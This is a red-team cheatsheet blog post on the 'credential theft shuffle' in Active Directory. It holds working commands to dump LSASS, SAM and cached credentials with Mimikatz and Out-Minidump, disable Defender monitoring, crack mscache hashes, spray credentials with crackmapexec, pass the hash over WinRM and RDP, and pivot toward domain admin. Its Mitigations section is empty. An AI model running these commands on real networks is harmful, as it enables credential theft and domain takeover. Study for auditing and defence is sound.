The Credential Theft Shuffle

Rich
7 min readApr 30, 2023

TL;DR ‘The Credential Theft Shuffle’ is Sean Metcalf’s term. This is just an attempt to put my notes regarding dumping and re-using credentials all in one place.

Welcome to Part VIII of our Cheatsheet Series!

Part I: Mimikatz cheatsheet

Part II: Set-Acl cheatsheet

Part III: Get-Acl cheatsheet

Part IV: Enumerating AD cheatsheet

Part V: Windows reverse shells cheatsheet

Part VI: MS Graph PowerShell cheatsheet

Part VII: Hash cracking cheatsheet

Part VIII: The Credential Theft Shuffle

Part IX: SACLs & Querying Collected Logs

Part X: Setting up a simple AD lab in Azure

Background

I cannot take credit for the term “The Credential Theft Shuffle” as Sean Metcalf coined it years ago. It’s catchy and it encapsulates a red team TTP perfectly so I have been using it ever since.

There’s nothing terribly new in here other than crackmapexec and Out-Minidump that we haven’t touched on in a prior howto somewhere. This is really just putting my notes regarding dumping and re-using creds all in one place.

All these techniques assume that you have Domain User access in AD and gained local administrator access to the system that you are dumping credentials from.

Finding plaintext creds in files

We’ll get started with an obvious one; searching files for passwords stored in cleartext:

Get-ChildItem C:\scripts\* -Recurse | Select-String -Pattern “password” -Context 3

Obviously this sort of things shouldn’t happen, but users are human after all. Hence it’s always worth looking for.

Dumping creds with Task Manager

It sounds obvious, but I have seen a lot of courses fail to mention this stupid simple method of dumping the LSASS. Any local admin can run Task Manager if they have access to the GUI, view all processes, right click on ‘Local Security Authority Process’, and ‘Create dump file’. They can then move the resulting .DMP file offline, load it into Mimikatz, and grab any creds it contains.

Dumping creds with Out-Minidump.ps1

This essentially does the same thing as Task Manager, but is quite handy if all you have is CLI access, for example via evil-winrm. Simply

upload /home/kali/Downloads/exploits/PowerShell/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1

Get-Process lsass | Out-Minidump

download C:\Users\vack\Documents\lsass_708.dmp /home/kali/Downloads/Pilfered/lsass_708.dmp

One can then move the resulting .DMP file offline, load it into Mimikatz, and grab any creds it contains.

Reading a LSASS dump file

Earlier we showed two ways to dump LSASS to a *.DMP file. One can read the file offline using mimikatz.exe:

sekurlsa::minidump lsass_708.DMP
sekurlsa::logonpasswords

Dumping creds with Invoke-Mimikatz.ps1

Everyone has their preferences, mine is that I rarely use mimikatz.exe outside of my own workstation VM on test.local. We keep a Windows 10 system around with mimikatz, John, Hashcat, BloodHound, Visual Studio, etc for reading data, compiling stuff, hash cracking, etc. If we were a big outfit we’d have a physical workstation for this sort of thing, but we run this place on a shoe string budget so it’s just a VM.

We prefer to use Invoke-Mimikatz.ps1 for THM, labs, ranges, exams, etc. The classic TTP for this goes

Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $true} -ComputerName Exodus

Invoke-Mimikatz -ComputerName Exodus -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'

Some other useful Mimikatz commands to put in that third spot are:

vault::cred #dump Credential Manager

lsadump::sam #dump the SAM

lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)

Cracking mscache

We first went over mscache while running a lab exercise on HiveNightmare. I have yet to take a course or exam that even mentioned it. The cliff notes, that we learned from CW6 Google and some hands on in the lab, is that mscache is what Windows uses to store domain credentials. It’s used so that after a Domain User has logged onto a workstation initially they can then login afterwards even if the system is disconnected.

The important thing to bear in mind about mscache is that it cannot be used to PTH, as NTLM can. It can only be cracked.

Hashcat:

hashcat -m2100 '$DCC2$10240#jane#cfea5bd6c6471535ce65b0a4425cc97e' /home/kali/Downloads/Wordlists/realhuman_phill.txt --force --potfile-disable

John:

John --format-mscache2 ./mscache.txt --wordlist=/home/kali/Downloads/Wordlists/JohnList

Dumping creds with crackmapexec

Crackmapexec, like mimikatz, is another one of those incredibly versatile tools. Let’s say you grabbed a username and either a password or a NTLM hash earlier. You can then throw it at every other system in the domain, lab, range, whatever. Not only will crackmapexec show what systems that user can access, it can automatically dump creds from any systems on which that user is a local admin.

The basic syntax is:

crackmapexec smb /home/kali/Downloads/targets.txt -d kinetic -u von -p SpellCast3r

One can leave off the -d part though if you don’t want to specify a domain and crackmapexec will use whatever domain the system is on.

Additional options:

winrm #attempt PSSession

rdp #kinda self explanatory, try to RDP with the provided creds

--local-auth #basically puts .\ in front of the user and tries local auth to each system

-H <NTLM> #PTH

--sam #auto dump the SAM on any systems the creds get local admin on

--lsa #auto dump the LSASS, includes mscache

Crackmapexec is a crossover in this howto as it both dumps and re-uses creds.

Pass-The-Hash (PTH)

PSSession via evil-winrm from Kali:

evil-winrm -i 10.65.1.38 -u administrator -H 861305d859334b557a3341c83be51462

RDP PTH from Kali:

xfreerdp /v:10.65.1.38 /u:administrator /pth: 861305d859334b557a3341c83be51462

If RDP wasn’t enabled already, just copy/paste this after connecting via evil-winrm:

Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’ -name “fDenyTSConnections” -value 0 ; Enable-NetFirewallRule -DisplayGroup “Remote Desktop”

If WinRM wasn’t enabled, copy/paste this after getting a reverse shell, or however you got in initially:

winrm quickconfig -force

Repeat

Once access is gained to a new system the process is repeated. Creds are dumped & re-used.

Sidenote on AD privileges

I am probably preaching to the choir, but one wants to check compromised accounts for any privileges they may hold in AD as well as for access to other systems. One can easily do this with PowerView:

Invoke-ACLScanner | Where-Object {$_.IdentityReference -like “*Mishky*”}

This method is simple, quick, and easy however it does not check the groups the given user might be in or groups that those groups are nested in. It works well for CTFs, ranges, etc where the user is only in one or two groups total, one can just run the query for those groups as well.

However in complex domain environments we are partial to Mishky’s version. It leverages Alex Hansen’s Get-ADNestedGroups.ps1 to check everything all at once. I have actually seen a vendor sell a tool that enumerates nested groups in AD for hundreds of dollars a year. Seriously, save your money and just use Get-ADNestedGroups.ps1 to enumerate upwards and use

Get-ADGroupMember -Identity “SSPR” -Recursive

To enumerate all members of a given group, including nested ones.

Endgame

The goal of ‘The Shuffle’ is of course to eventually pivot to an account that is a Domain Admin, has privileges to add themselves to it, can DCSync, etc. At this point one owns the domain, can dump all user’s NTLM hashes, and can then feed them into Crackstation, hashcat, etc to check for plaintext passwords.

Given human nature an attacker is bound to get lucky and find that Joe in Finance is using the same password on the origination’s bank account that he is using in AD, for example. Password re-use and human nature can vastly expand the attack surface.

Mitigations

References

The Credential Theft Shuffle: https://adsecurity.org/?p=2362

Finding strings in files with PowerShell: https://blog.ironmansoftware.com/daily-powershell/powershell-select-string/

Get-ADUserNestedGroups: http://blog.tofte-it.dk/powershell-get-all-nested-groups-for-a-user-in-active-directory/

--

--

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.